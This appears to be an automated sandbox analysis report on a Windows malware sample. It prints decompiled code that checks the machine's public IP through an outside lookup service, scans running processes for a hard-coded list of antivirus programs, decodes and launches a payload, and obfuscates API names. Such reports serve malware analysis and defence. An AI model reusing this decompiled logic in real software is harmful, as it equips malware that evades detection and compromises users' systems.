                                    								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
                                    									while(1) {
                                    										_t54 = _a4;
                                    										if(_t54 == 0) {
                                    											goto L13;
                                    										}
                                    										 *((char*)(_t54 + _t67)) = 0;
                                    										_a4 = 0;
                                    										_v12 = 1;
                                    										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
                                    											continue;
                                    										} else {
                                    										}
                                    										goto L13;
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    					L13:
                                    					InternetCloseHandle(_t63); // executed
                                    					InternetCloseHandle(_v16);
                                    					VirtualFree(_v20, 0, 0x8000); // executed
                                    					return _v12;
                                    				} else {
                                    					return _t40;
                                    				}
                                    			}




























                                    0x0f148058
                                    0x0f14805b
                                    0x0f148060
                                    0x0f148063
                                    0x0f148063
                                    0x0f14806b
                                    0x0f148082
                                    0x0f148088
                                    0x0f14808a
                                    0x0f148091
                                    0x0f148096
                                    0x0f1480af
                                    0x0f1480b8
                                    0x0f1480c0
                                    0x0f1480c3
                                    0x0f1480e7
                                    0x0f1480eb
                                    0x0f1480f8
                                    0x0f148101
                                    0x0f148108
                                    0x0f14810f
                                    0x0f148116
                                    0x0f14811d
                                    0x0f148124
                                    0x0f14812b
                                    0x0f148132
                                    0x0f148139
                                    0x0f148140
                                    0x0f148147
                                    0x0f148156
                                    0x0f14816d
                                    0x0f1481bc
                                    0x0f14816f
                                    0x0f148175
                                    0x0f148178
                                    0x0f14817d
                                    0x0f14818c
                                    0x0f148190
                                    0x0f148190
                                    0x0f148195
                                    0x00000000
                                    0x00000000
                                    0x0f148197
                                    0x0f1481a2
                                    0x0f1481a9
                                    0x0f1481b8
                                    0x00000000
                                    0x00000000
                                    0x0f1481ba
                                    0x00000000
                                    0x0f1481b8
                                    0x0f148190
                                    0x0f14818c
                                    0x0f14816d
                                    0x0f148156
                                    0x0f1481c2
                                    0x0f1481c9
                                    0x0f1481ce
                                    0x0f1481da
                                    0x0f1481e9
                                    0x0f14809e
                                    0x0f14809e
                                    0x0f14809e

                                    APIs
                                    • InternetCloseHandle.WININET(?), ref: 0F148063
                                    • InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F148082
                                    • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F147046,ipv4bot.whatismyipaddress.com,0F14FF90), ref: 0F1480AF
                                    • wsprintfW.USER32 ref: 0F1480C3
                                    • HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F1480E1
                                    • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F14814E
                                    • HttpSendRequestW.WININET(00000000,00690074,0069006C,00000000,00000074), ref: 0F148165
                                    • InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F148184
                                    • InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F1481B0
                                    • GetLastError.KERNEL32 ref: 0F1481BC
                                    • InternetCloseHandle.WININET(00000000), ref: 0F1481C9
                                    • InternetCloseHandle.WININET(00000000), ref: 0F1481CE
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F147046), ref: 0F1481DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
                                    • String ID: :$H$HTTP/1.1$a$a$a$b$l$o$p$s$t$t
                                    • API String ID: 3906118045-2187218134
                                    • Opcode ID: 913a886aba911e3e80ab5987e55e8dd7294e69b378090a359f2dcd99e882b6c9
                                    • Instruction ID: 43064b82fd15e8e79b00abda3444bef49ccb0c31e247dffcc2c0855050c872cf
                                    • Opcode Fuzzy Hash: 913a886aba911e3e80ab5987e55e8dd7294e69b378090a359f2dcd99e882b6c9
                                    • Instruction Fuzzy Hash: C2419534640208BFEB108F51DC48F9E7FB9FF84B65F104119FA04A6281C7B5A9A4CFA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 100%
                                    			_entry_() {
                                    				void* _v8;
                                    				void* _v12;
                                    				CHAR* _v16;
                                    				int _v20;
                                    				void* _v24;
                                    				int _v28;
                                    				void* _v32;
                                    				int _v36;
                                    				int _v40;
                                    				int _v44;
                                    				int _v48;
                                    				int _v52;
                                    				int _v60;
                                    				char _v80;
                                    				void* _t54;
                                    				void* _t55;
                                    				int _t79;
                                    				void* _t81;
                                    				short* _t97;
                                    				void* _t114;
                                    
                                    				Sleep(0x3e8); // executed
                                    				_t54 = E0F1447D0(_t90, _t106); // executed
                                    				if(_t54 == 0) {
                                    					_t55 = CreateThread(0, 0, E0F142D30, 0, 0, 0); // executed
                                    					_v8 = _t55;
                                    					if(_v8 != 0) {
                                    						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
                                    							_t90 = _v8;
                                    							TerminateThread(_v8, 0);
                                    						}
                                    						_t106 = _v8;
                                    						CloseHandle(_v8); // executed
                                    					}
                                    					E0F1448C0(); // executed
                                    					E0F1442B0(_t90, _t106); // executed
                                    					E0F146550( &_v80); // executed
                                    					_v40 = 0;
                                    					_v36 = 0;
                                    					_v28 = 0;
                                    					_v44 = 0;
                                    					E0F146500( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
                                    					_v48 = 0;
                                    					_v16 = 0;
                                    					if(E0F144B00(_v28) == 0) {
                                    						while(_v48 == 0) {
                                    							_t81 = E0F145860(_v28, _v44, _v40, _v36,  &_v16); // executed
                                    							_t114 = _t114 + 0xc;
                                    							if(_t81 != 0) {
                                    								_v48 = 1;
                                    							} else {
                                    								Sleep(0x2710);
                                    							}
                                    						}
                                    						E0F1464C0( &_v80);
                                    						_v32 = 0;
                                    						_v20 = 0;
                                    						_v52 = 0;
                                    						_v60 = 0;
                                    						__eflags = _v16;
                                    						if(_v16 == 0) {
                                    							L19:
                                    							E0F144200();
                                    							InitializeCriticalSection(0xf152a48);
                                    							__eflags = _v52;
                                    							if(__eflags == 0) {
                                    								E0F143FF0( &_v80);
                                    							} else {
                                    								E0F1441D0(_v32, _v20, __eflags);
                                    							}
                                    							DeleteCriticalSection(0xf152a48);
                                    							__eflags = E0F143C70();
                                    							if(__eflags != 0) {
                                    								E0F1445B0(__eflags);
                                    							}
                                    							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                    							__eflags = _v24;
                                    							if(__eflags != 0) {
                                    								GetModuleFileNameW(0, _v24, 0x100);
                                    								E0F143DB0(_v24, _v24, __eflags);
                                    								VirtualFree(_v24, 0, 0x8000);
                                    							}
                                    							__eflags =  *0xf152a44;
                                    							if( *0xf152a44 != 0) {
                                    								_t97 =  *0xf152a44; // 0x2280000
                                    								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
                                    							}
                                    							ExitThread(0);
                                    						}
                                    						_v20 = lstrlenA(_v16);
                                    						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
                                    						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
                                    						__eflags = _t79;
                                    						if(_t79 != 0) {
                                    							_v52 = 1;
                                    							goto L19;
                                    						}
                                    						ExitProcess(0);
                                    					} else {
                                    						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                    						_t119 = _v12;
                                    						if(_v12 != 0) {
                                    							GetModuleFileNameW(0, _v12, 0x100);
                                    							E0F143DB0(_v12,  &_v44, _t119);
                                    							VirtualFree(_v12, 0, 0x8000);
                                    						}
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				ExitProcess(0);
                                    			}























                                    0x0f144b2b
                                    0x0f144b31
                                    0x0f144b38
                                    0x0f144b51
                                    0x0f144b57
                                    0x0f144b5e
                                    0x0f144b74
                                    0x0f144b78
                                    0x0f144b7c
                                    0x0f144b7c
                                    0x0f144b82
                                    0x0f144b86
                                    0x0f144b86
                                    0x0f144b8c
                                    0x0f144b91
                                    0x0f144b99
                                    0x0f144b9e
                                    0x0f144ba5
                                    0x0f144bac
                                    0x0f144bb3
                                    0x0f144bcd
                                    0x0f144bd2
                                    0x0f144bd9
                                    0x0f144bea
                                    0x0f144c3b
                                    0x0f144c53
                                    0x0f144c58
                                    0x0f144c5d
                                    0x0f144c6c
                                    0x0f144c5f
                                    0x0f144c64
                                    0x0f144c64
                                    0x0f144c73
                                    0x0f144c78
                                    0x0f144c7d
                                    0x0f144c84
                                    0x0f144c8b
                                    0x0f144c92
                                    0x0f144c99
                                    0x0f144c9d
                                    0x0f144cef
                                    0x0f144cef
                                    0x0f144cf9
                                    0x0f144cff
                                    0x0f144d03
                                    0x0f144d15
                                    0x0f144d05
                                    0x0f144d0b
                                    0x0f144d0b
                                    0x0f144d1f
                                    0x0f144d2a
                                    0x0f144d2c
                                    0x0f144d2e
                                    0x0f144d2e
                                    0x0f144d47
                                    0x0f144d4a
                                    0x0f144d4e
                                    0x0f144d5b
                                    0x0f144d64
                                    0x0f144d74
                                    0x0f144d74
                                    0x0f144d7a
                                    0x0f144d81
                                    0x0f144d89
                                    0x0f144d97
                                    0x0f144d97
                                    0x0f144d9f
                                    0x0f144d9f
                                    0x0f144ca9
                                    0x0f144cbf
                                    0x0f144cd6
                                    0x0f144cdc
                                    0x0f144cde
                                    0x0f144ce8
                                    0x00000000
                                    0x0f144ce8
                                    0x0f144ce2
                                    0x0f144bec
                                    0x0f144c00
                                    0x0f144c03
                                    0x0f144c07
                                    0x0f144c14
                                    0x0f144c1d
                                    0x0f144c2d
                                    0x0f144c2d
                                    0x0f144c35
                                    0x0f144c35
                                    0x0f144bea
                                    0x0f144b3c

                                    APIs
                                    • Sleep.KERNEL32(000003E8), ref: 0F144B2B
                                      • Part of subcall function 0F1447D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14482C
                                      • Part of subcall function 0F1447D0: lstrcpyW.KERNEL32 ref: 0F14484F
                                      • Part of subcall function 0F1447D0: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F144856
                                      • Part of subcall function 0F1447D0: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14486E
                                      • Part of subcall function 0F1447D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14487A
                                      • Part of subcall function 0F1447D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F144881
                                      • Part of subcall function 0F1447D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14489B
                                    • ExitProcess.KERNEL32 ref: 0F144B3C
                                    • CreateThread.KERNEL32 ref: 0F144B51
                                    • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F144B69
                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 0F144B7C
                                    • CloseHandle.KERNEL32(00000000), ref: 0F144B86
                                    • VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F144BFA
                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F144C14
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F144C2D
                                    • ExitProcess.KERNEL32 ref: 0F144C35
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
                                    • String ID: open
                                    • API String ID: 1803241880-2758837156
                                    • Opcode ID: 1f21e5273a1d8b736f8f0b04515439e22457436af04e2ee5ec4331c2670c3d7e
                                    • Instruction ID: dda7cda757b37dfd57fccc007f87df731be2a8b9ae86ebb230b08c76a69bd172
                                    • Opcode Fuzzy Hash: 1f21e5273a1d8b736f8f0b04515439e22457436af04e2ee5ec4331c2670c3d7e
                                    • Instruction Fuzzy Hash: 37711D74A80309ABEB14DFE0DC59FEE7774AF84B16F104014E605AA1C1DBB879A8CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 362 f147b70-f147c0a VirtualAlloc * 2 363 f147c32-f147c3a 362->363 364 f147c0c-f147c22 CreateToolhelp32Snapshot 362->364 365 f147c24-f147c2c VirtualFree 364->365 366 f147c3d-f147c57 Process32FirstW 364->366 365->363 367 f147d2d-f147d4b VirtualFree FindCloseChangeNotification 366->367 368 f147c5d 366->368 370 f147d57-f147d5f 367->370 371 f147d4d-f147d55 VirtualFree 367->371 369 f147c60-f147c62 368->369 372 f147d07-f147d0b 369->372 373 f147c68-f147c6b 369->373 371->370 374 f147d25-f147d2b 372->374 375 f147d0d-f147d13 372->375 376 f147c70-f147c7d 373->376 374->367 375->374 377 f147d15-f147d20 lstrlenW 375->377 379 f147c7f-f147c83 376->379 380 f147c8a-f147c98 376->380 377->374 379->376 381 f147c85-f147c88 379->381 382 f147caf-f147cbe lstrcatW * 2 380->382 383 f147c9a-f147cad lstrcpyW lstrcatW 380->383 384 f147ce7-f147cf6 Process32NextW 381->384 385 f147cc0-f147ce4 lstrlenW 382->385 383->385 384->372 386 f147cf8-f147d01 GetLastError 384->386 385->384 386->369 386->372
                                    C-Code - Quality: 80%
                                    			E0F147B70(void** _a4, intOrPtr* _a8) {
                                    				signed int _v8;
                                    				long _v12;
                                    				long _v16;
                                    				void* _v20;
                                    				void* _v24;
                                    				WCHAR* _v28;
                                    				WCHAR* _v32;
                                    				WCHAR* _v36;
                                    				WCHAR* _v40;
                                    				WCHAR* _v44;
                                    				WCHAR* _v48;
                                    				WCHAR* _v52;
                                    				WCHAR* _v56;
                                    				WCHAR* _v60;
                                    				WCHAR* _v64;
                                    				WCHAR* _v68;
                                    				WCHAR* _v72;
                                    				WCHAR* _v76;
                                    				WCHAR* _v80;
                                    				void* _t46;
                                    				void* _t47;
                                    				void* _t49;
                                    				int _t50;
                                    				WCHAR* _t56;
                                    				int _t63;
                                    				void** _t68;
                                    				void* _t75;
                                    				long _t76;
                                    				WCHAR* _t77;
                                    				signed int _t79;
                                    				void* _t83;
                                    
                                    				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    				_t68 = _a4;
                                    				 *_t68 = _t46;
                                    				_v80 = L"AVP.EXE";
                                    				_v76 = L"ekrn.exe";
                                    				_v72 = L"avgnt.exe";
                                    				_v68 = L"ashDisp.exe";
                                    				_v64 = L"NortonAntiBot.exe";
                                    				_v60 = L"Mcshield.exe";
                                    				_v56 = L"avengine.exe";
                                    				_v52 = L"cmdagent.exe";
                                    				_v48 = L"smc.exe";
                                    				_v44 = L"persfw.exe";
                                    				_v40 = L"pccpfw.exe";
                                    				_v36 = L"fsguiexe.exe";
                                    				_v32 = L"cfp.exe";
                                    				_v28 = L"msmpeng.exe";
                                    				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
                                    				_t75 = _t47;
                                    				_v24 = _t75;
                                    				if(_t75 == 0) {
                                    					L3:
                                    					return 0;
                                    				} else {
                                    					 *_t75 = 0x22c; // executed
                                    					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
                                    					_v20 = _t49;
                                    					if(_t49 != 0xffffffff) {
                                    						_t79 = 0;
                                    						_push(_t75);
                                    						_v12 = 0;
                                    						_a4 = 0;
                                    						_v16 = 0;
                                    						_v8 = 0;
                                    						_t50 = Process32FirstW(_t49); // executed
                                    						if(_t50 != 0) {
                                    							L6:
                                    							while(_t79 == 0) {
                                    								_t77 = _t75 + 0x24;
                                    								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
                                    									_t79 = _t79 + 1;
                                    									if(_t79 < 0xe) {
                                    										continue;
                                    									} else {
                                    										_t79 = _v8;
                                    									}
                                    									L15:
                                    									_t75 = _v24;
                                    									_t63 = Process32NextW(_v20, _t75); // executed
                                    									if(_t63 != 0 && GetLastError() != 0x12) {
                                    										goto L6;
                                    									}
                                    									goto L17;
                                    								}
                                    								_push(_t77);
                                    								_push( *_t68);
                                    								_v16 = 1;
                                    								if(_a4 != 0) {
                                    									lstrcatW();
                                    									lstrcatW( *_t68, ",");
                                    								} else {
                                    									lstrcpyW();
                                    									lstrcatW( *_t68, ",");
                                    								}
                                    								_a4 =  &(_a4[0]);
                                    								_v12 = _v12 + lstrlenW(_t77) * 2;
                                    								_t79 =  >  ? 1 : _v8;
                                    								_v8 = _t79;
                                    								goto L15;
                                    							}
                                    							L17:
                                    							if(_v16 != 0) {
                                    								_t56 =  *_t68;
                                    								if( *_t56 != 0) {
                                    									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
                                    								}
                                    							}
                                    							 *_a8 = _v12;
                                    						}
                                    						VirtualFree(_t75, 0, 0x8000); // executed
                                    						FindCloseChangeNotification(_v20); // executed
                                    						_t76 = _v16;
                                    						if(_t76 == 0) {
                                    							VirtualFree( *_t68, _t76, 0x8000); // executed
                                    						}
                                    						return _t76;
                                    					} else {
                                    						VirtualFree(_t75, 0, 0x8000);
                                    						goto L3;
                                    					}
                                    				}
                                    			}


































                                    0x0f147b8d
                                    0x0f147b8f
                                    0x0f147b9d
                                    0x0f147b9f
                                    0x0f147ba6
                                    0x0f147bad
                                    0x0f147bb4
                                    0x0f147bbb
                                    0x0f147bc2
                                    0x0f147bc9
                                    0x0f147bd0
                                    0x0f147bd7
                                    0x0f147bde
                                    0x0f147be5
                                    0x0f147bec
                                    0x0f147bf3
                                    0x0f147bfa
                                    0x0f147c01
                                    0x0f147c03
                                    0x0f147c05
                                    0x0f147c0a
                                    0x0f147c34
                                    0x0f147c3a
                                    0x0f147c0c
                                    0x0f147c10
                                    0x0f147c16
                                    0x0f147c1c
                                    0x0f147c22
                                    0x0f147c3f
                                    0x0f147c41
                                    0x0f147c43
                                    0x0f147c46
                                    0x0f147c49
                                    0x0f147c4c
                                    0x0f147c4f
                                    0x0f147c57
                                    0x00000000
                                    0x0f147c60
                                    0x0f147c68
                                    0x0f147c70
                                    0x0f147c7f
                                    0x0f147c83
                                    0x00000000
                                    0x0f147c85
                                    0x0f147c85
                                    0x0f147c85
                                    0x0f147ce7
                                    0x0f147ce7
                                    0x0f147cee
                                    0x0f147cf6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f147cf6
                                    0x0f147c8e
                                    0x0f147c8f
                                    0x0f147c91
                                    0x0f147c98
                                    0x0f147cb5
                                    0x0f147cbe
                                    0x0f147c9a
                                    0x0f147c9a
                                    0x0f147ca7
                                    0x0f147ca7
                                    0x0f147cc0
                                    0x0f147cde
                                    0x0f147ce1
                                    0x0f147ce4
                                    0x00000000
                                    0x0f147ce4
                                    0x0f147d07
                                    0x0f147d0b
                                    0x0f147d0d
                                    0x0f147d13
                                    0x0f147d20
                                    0x0f147d20
                                    0x0f147d13
                                    0x0f147d2b
                                    0x0f147d2b
                                    0x0f147d3b
                                    0x0f147d40
                                    0x0f147d46
                                    0x0f147d4b
                                    0x0f147d55
                                    0x0f147d55
                                    0x0f147d5f
                                    0x0f147c24
                                    0x0f147c2c
                                    0x00000000
                                    0x0f147c2c
                                    0x0f147c22

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F147B8D
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F147C01
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F147C16
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F147C2C
                                    • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F147C4F
                                    • lstrcmpiW.KERNEL32(0F1503AC,-00000024), ref: 0F147C75
                                    • Process32NextW.KERNEL32(?,?), ref: 0F147CEE
                                    • GetLastError.KERNEL32 ref: 0F147CF8
                                    • lstrlenW.KERNEL32(00000000), ref: 0F147D16
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F147D3B
                                    • FindCloseChangeNotification.KERNEL32(?), ref: 0F147D40
                                    • VirtualFree.KERNELBASE(?,?,00008000), ref: 0F147D55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
                                    • String ID: i)w
                                    • API String ID: 1411803383-1280834553
                                    • Opcode ID: 19012602e29d3b7790e4a27250864a9ef68cef1c94b66388f93a56b3929e6adb
                                    • Instruction ID: 97e325acea79677ac55da82c9b994057d18117d0c76afafee74e3b1395c558a7
                                    • Opcode Fuzzy Hash: 19012602e29d3b7790e4a27250864a9ef68cef1c94b66388f93a56b3929e6adb
                                    • Instruction Fuzzy Hash: 6851BE71E40219EFCB20CF94D948BAEBBB4FF88B25F214059E910BB281C7746965CF94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 445 f1482b0-f1482d5 CryptAcquireContextW 446 f1483c9-f1483d1 445->446 447 f1482db-f1482dd 445->447 448 f1482e0-f1482ec 447->448 448->448 449 f1482ee-f148305 VirtualAlloc 448->449 450 f1483d2-f1483f3 CryptReleaseContext VirtualFree 449->450 451 f14830b-f14830d 449->451 451->450 452 f148313-f148357 GetModuleHandleA 451->452 453 f148367-f148374 GetProcAddress 452->453 454 f148359-f148365 LoadLibraryA 452->454 455 f1483ae 453->455 456 f148376-f14837f 453->456 454->453 454->455 457 f1483b0-f1483c3 CryptReleaseContext VirtualFree 455->457 456->455 459 f148381-f148385 456->459 457->446 460 f1483a7-f1483ac 459->460 461 f148387-f14838a 459->461 460->457 462 f148391-f1483a5 461->462 462->460 462->462
                                    C-Code - Quality: 66%
                                    			E0F1482B0(intOrPtr __ecx, void* __edx) {
                                    				long* _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				char _v34;
                                    				short _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				char _v48;
                                    				long** _t37;
                                    				void* _t40;
                                    				struct HINSTANCE__* _t45;
                                    				_Unknown_base(*)()* _t46;
                                    				signed int _t54;
                                    				long _t55;
                                    				intOrPtr _t56;
                                    				signed int _t58;
                                    				signed int _t60;
                                    				void* _t63;
                                    				void* _t64;
                                    				void* _t65;
                                    
                                    				_t54 = 0;
                                    				_v12 = __ecx;
                                    				_t37 =  &_v8;
                                    				_t63 = __edx;
                                    				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
                                    				if(_t37 == 0) {
                                    					L15:
                                    					return _t54;
                                    				} else {
                                    					_t58 = 0;
                                    					do {
                                    						_t3 = _t58 + 0x61; // 0x61
                                    						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
                                    						_t58 = _t58 + 1;
                                    					} while (_t58 < 0x1a);
                                    					_t7 = _t63 + 1; // 0x1
                                    					_t55 = _t7;
                                    					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
                                    					_t64 = _t40;
                                    					if(_t64 == 0 || _t63 >= _t55) {
                                    						CryptReleaseContext(_v8, 0);
                                    						VirtualFree(_t64, 0, 0x8000);
                                    						return 0;
                                    					} else {
                                    						_v48 = 0x70797243;
                                    						_v44 = 0x6e654774;
                                    						_v40 = 0x646e6152;
                                    						_v36 = 0x6d6f;
                                    						_v34 = 0;
                                    						_v32 = 0x61766441;
                                    						_v28 = 0x32336970;
                                    						_v24 = 0x6c6c642e;
                                    						_v20 = 0;
                                    						_t45 = GetModuleHandleA( &_v32);
                                    						if(_t45 != 0) {
                                    							L7:
                                    							_t19 =  &_v48; // 0x70797243
                                    							_t46 = GetProcAddress(_t45, _t19);
                                    							if(_t46 == 0) {
                                    								goto L13;
                                    							} else {
                                    								_push(_t64);
                                    								_push(_t63);
                                    								_push(_v8);
                                    								if( *_t46() == 0) {
                                    									goto L13;
                                    								} else {
                                    									_t60 = 0;
                                    									if(_t63 != 0) {
                                    										_t56 = _v12;
                                    										_v16 = 0x1a;
                                    										do {
                                    											asm("cdq");
                                    											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
                                    											_t60 = _t60 + 1;
                                    										} while (_t60 < _t63);
                                    									}
                                    									_t54 = 1;
                                    								}
                                    							}
                                    						} else {
                                    							_t18 =  &_v32; // 0x61766441
                                    							_t45 = LoadLibraryA(_t18);
                                    							if(_t45 == 0) {
                                    								L13:
                                    								_t54 = 0;
                                    							} else {
                                    								goto L7;
                                    							}
                                    						}
                                    						CryptReleaseContext(_v8, 0);
                                    						VirtualFree(_t64, 0, 0x8000); // executed
                                    						goto L15;
                                    					}
                                    				}
                                    			}



























                                    0x0f1482c0
                                    0x0f1482c2
                                    0x0f1482c7
                                    0x0f1482ca
                                    0x0f1482cd
                                    0x0f1482d5
                                    0x0f1483c9
                                    0x0f1483d1
                                    0x0f1482db
                                    0x0f1482db
                                    0x0f1482e0
                                    0x0f1482e0
                                    0x0f1482e3
                                    0x0f1482e8
                                    0x0f1482e9
                                    0x0f1482f5
                                    0x0f1482f5
                                    0x0f1482fb
                                    0x0f148301
                                    0x0f148305
                                    0x0f1483d7
                                    0x0f1483e5
                                    0x0f1483f3
                                    0x0f148313
                                    0x0f148316
                                    0x0f14831e
                                    0x0f148325
                                    0x0f14832c
                                    0x0f148332
                                    0x0f148336
                                    0x0f14833d
                                    0x0f148344
                                    0x0f14834b
                                    0x0f14834f
                                    0x0f148357
                                    0x0f148367
                                    0x0f148367
                                    0x0f14836c
                                    0x0f148374
                                    0x00000000
                                    0x0f148376
                                    0x0f148376
                                    0x0f148377
                                    0x0f148378
                                    0x0f14837f
                                    0x00000000
                                    0x0f148381
                                    0x0f148381
                                    0x0f148385
                                    0x0f148387
                                    0x0f14838a
                                    0x0f148391
                                    0x0f148395
                                    0x0f14839e
                                    0x0f1483a2
                                    0x0f1483a3
                                    0x0f148391
                                    0x0f1483a7
                                    0x0f1483a7
                                    0x0f14837f
                                    0x0f148359
                                    0x0f148359
                                    0x0f14835d
                                    0x0f148365
                                    0x0f1483ae
                                    0x0f1483ae
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f148365
                                    0x0f1483b5
                                    0x0f1483c3
                                    0x00000000
                                    0x0f1483c3
                                    0x0f148305

                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F1482CD
                                    • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F1482FB
                                    • GetModuleHandleA.KERNEL32(?), ref: 0F14834F
                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F14835D
                                    • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F14836C
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1483B5
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1483C3
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1483D7
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1483E5
                                    Strings
                                    Memory Dump Source
